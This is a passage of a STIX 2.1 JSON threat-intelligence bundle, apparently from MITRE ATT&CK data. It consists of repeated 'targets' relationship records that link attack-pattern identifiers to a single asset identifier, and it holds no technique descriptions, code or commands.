"relationship--3082254a-2455-4520-82bb-35acd693d0bf", "created": "2024-07-01T10:37:15.836865", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.836867", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--457c7820-d331-465a-915e-42f85500ccc4", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--85593871-22fe-4c8e-a3c2-251b7d9137b2", "created": "2024-07-01T10:37:15.836875", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.836877", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--47f2d673-ca62-47e9-929b-1b0be9657611", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--695e6c70-7466-48e8-9e90-61844a6aabe8", "created": "2024-07-01T10:37:15.836884", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.836886", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--4933e63b-9b77-476e-ab29-761bc5b7d15a", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7d1889a5-fec2-4155-99b5-84868c187d48", "created": "2024-07-01T10:37:15.836894", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.836896", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--494ab9f0-36e0-4b06-b10d-57285b040a06", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0dea3216-8033-4ff7-a960-0fd0853917d5", "created": "2024-07-01T10:37:15.836903", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.836906", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--4a2975db-414e-4c0c-bd92-775987514b4b", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e842fa73-fa67-4f06-83d3-8ea9c82c903c", "created": "2024-07-01T10:37:15.836913", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.836915", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--4a5b7ade-8bb5-4853-84ed-23f262002665", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--fbe6c4be-ec82-40c2-b673-a81763c2f7fe", "created": "2024-07-01T10:37:15.836923", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.836925", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--4ab929c6-ee2d-4fb5-aab4-b14be2ed7179", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f499a442-3c82-4f8d-999f-5b16a5746817", "created": "2024-07-01T10:37:15.836933", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.836935", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--4ae4f953-fe58-4cc8-a327-33257e30a830", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--72370277-35e8-4701-9a24-48522cedefc7", "created": "2024-07-01T10:37:15.836942", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.836944", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--4bc31b94-045b-4752-8920-aebaebdb6470", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9c434f83-9abb-45df-a00f-9a36ee96e6b1", "created": "2024-07-01T10:37:15.836952", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.836954", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--37879bfd-fda8-43c2-abb6-ee432ca3cb1e", "created": "2024-07-01T10:37:15.836962", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.836964", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--4cbc6a62-9e34-4f94-8a19-5c1a11392a49", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a3a7b72a-fa68-4b0d-8426-4af2455ea3b8", "created": "2024-07-01T10:37:15.836971", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.836973", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--4eb28bed-d11a-4641-9863-c2ac017d910a", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a100606b-924b-4232-a0b2-548609c5bdee", "created": "2024-07-01T10:37:15.836981", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.836983", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--4eeaf8a9-c86b-4954-a663-9555fb406466", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--133013b9-5b54-4c2b-bdc7-8c50b3866207", "created": "2024-07-01T10:37:15.836990", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.836992", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--4f9ca633-15c5-463c-9724-bdcd54fde541", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7c83e868-be35-42fc-97c2-d99371e5dcc2", "created": "2024-07-01T10:37:15.837000", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.837002", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--4fe28b27-b13c-453e-a386-c2ef362a573b", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--061ffbae-baee-4ae8-9f40-e10b6cc7c189", "created": "2024-07-01T10:37:15.837009", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.837011", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--4ff5d6a8-c062-4c68-a778-36fc5edd564f", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7dadcb9e-4d0a-4e3a-b8e0-f77586622835", "created": "2024-07-01T10:37:15.837019", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.837021", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--5095a853-299c-4876-abd7-ac0050fb5462", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f202ac15-38cd-4ab7-a253-ce8cbb523c0a", "created": "2024-07-01T10:37:15.837029", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.837031", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--51a14c76-dd3b-440b-9c20-2bf91d25a814", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--41931f5c-0b87-462b-ac02-9280525c5f9a", "created": "2024-07-01T10:37:15.837038", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.837040", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--51ea26b1-ff1e-4faa-b1a0-1114cd298c87", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9490e988-d1b5-497f-9cf3-b947bdb80c09", "created": "2024-07-01T10:37:15.837048", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.837050", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--5372c5fe-f424-4def-bcd5-d3a8e770f07b", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--56555128-573c-43c3-9feb-2764ff0bbf00", "created": "2024-07-01T10:37:15.837058", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.837060", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--53ac20cd-aca3-406e-9aa0-9fc7fdc60a5a", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--abc826c1-591d-42e7-bfb4-efbb383ba987", "created": "2024-07-01T10:37:15.837067", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.837070", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--543fceb5-cb92-40cb-aacf-6913d4db58bc", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--4d33ef0c-7bf7-44a8-be64-8d5fe45bb649", "created": "2024-07-01T10:37:15.837077", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.837079", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--544b0346-29ad-41e1-a808-501bb4193f47", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ab580408-1da8-4d64-8ae2-07f524b67233", "created": "2024-07-01T10:37:15.837087", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.837089", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--54a649ff-439a-41a4-9856-8d144a2551ba", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2621953c-f20a-40b2-aa86-f1408e4e2d3f", "created": "2024-07-01T10:37:15.837096", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.837098", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--54b4c251-1f0e-4eba-ba6b-dbc7a6f6f06b", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--4f851d10-9c79-4f34-a6e8-6390e229d226", "created": "2024-07-01T10:37:15.837106", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.837108", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--54ca26f3-c172-4231-93e5-ccebcac2161f", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5681dbbb-3261-4202-8530-840f4fc89626", "created": "2024-07-01T10:37:15.837116", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.837118", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--561ae9aa-c28a-4144-9eec-e7027a14c8c3", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c31a8367-4a8f-46ac-9161-91df6daff912", "created": "2024-07-01T10:37:15.837125", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.837127", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--564998d8-ab3e-4123-93fb-eccaa6b9714a", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--51b2afa2-ff0a-4b4c-b51e-1b2abe3d2457", "created": "2024-07-01T10:37:15.837135", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.837137", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--565275d5-fcc3-4b66-b4e7-928e4cac6b8c", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--889774f8-9f61-4265-90c6-0a7392efd0c5", "created": "2024-07-01T10:37:15.837145", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.837147", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--57340c81-c025-4189-8fa0-fc7ede51bae4", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--100d3047-2d2f-4475-8364-45fe394d901a", "created": "2024-07-01T10:37:15.837154", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.837156", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--58a3e6aa-4453-4cc8-a51f-4befe80b31a8", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--eaeae984-983b-4632-9918-e5a5551cff4a", "created": "2024-07-01T10:37:15.837164", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.837166", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--94a88765-f2e7-4667-aa6b-7d1135d41c7e", "created": "2024-07-01T10:37:15.837174", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.837176", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--5909f20f-3c39-4795-be06-ef1ea40d350b", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--cabbd095-92fd-4062-9525-73ad814290d6", "created": "2024-07-01T10:37:15.837183", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.837185", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--59ff91cd-1430-4075-8563-e6f15f4f9ff5", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--adbcef4e-b4e2-479b-bb61-f7200a09b854", "created": "2024-07-01T10:37:15.837193", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.837195", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--5b0ad6f8-6a16-4966-a4ef-d09ea6e2a9f5", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6784c771-42bd-457d-a817-3389621bb2be", "created": "2024-07-01T10:37:15.837203", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.837205", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--5bfccc3f-2326-4112-86cc-c1ece9d8a2b5", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--bf574a2e-1eb1-4fa1-af13-73645155cde1", "created": "2024-07-01T10:37:15.837212", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.837214", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--5d0d3609-d06d-49e1-b9c9-b544e0c618cb", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--fd3c3823-857b-4e51-a320-4292609483d0", "created": "2024-07-01T10:37:15.837222", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.837224", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--5d2be8b9-d24c-4e98-83bf-2f5f79477163", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--17141521-cb91-472f-a2b2-409c3e106bd6", "created": "2024-07-01T10:37:15.837232", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.837234", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--5e4a2073-9643-44cb-a0b5-e7f4048446c7", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--62e0f65c-62fe-40e6-aa92-ed71b6e63c67", "created": "2024-07-01T10:37:15.837242", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.837244", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--60b508a1-6a5e-46b1-821a-9f7b78752abf", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d08054f7-a6ea-4a90-a26e-00acd10b31bb", "created": "2024-07-01T10:37:15.837251", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.837254", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--60d0c01d-e2bf-49dd-a453-f8a9c9fa6f65", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d964698d-f5f7-40bb-bf33-b7dc38ae98c1", "created": "2024-07-01T10:37:15.837261", "created_by_ref": 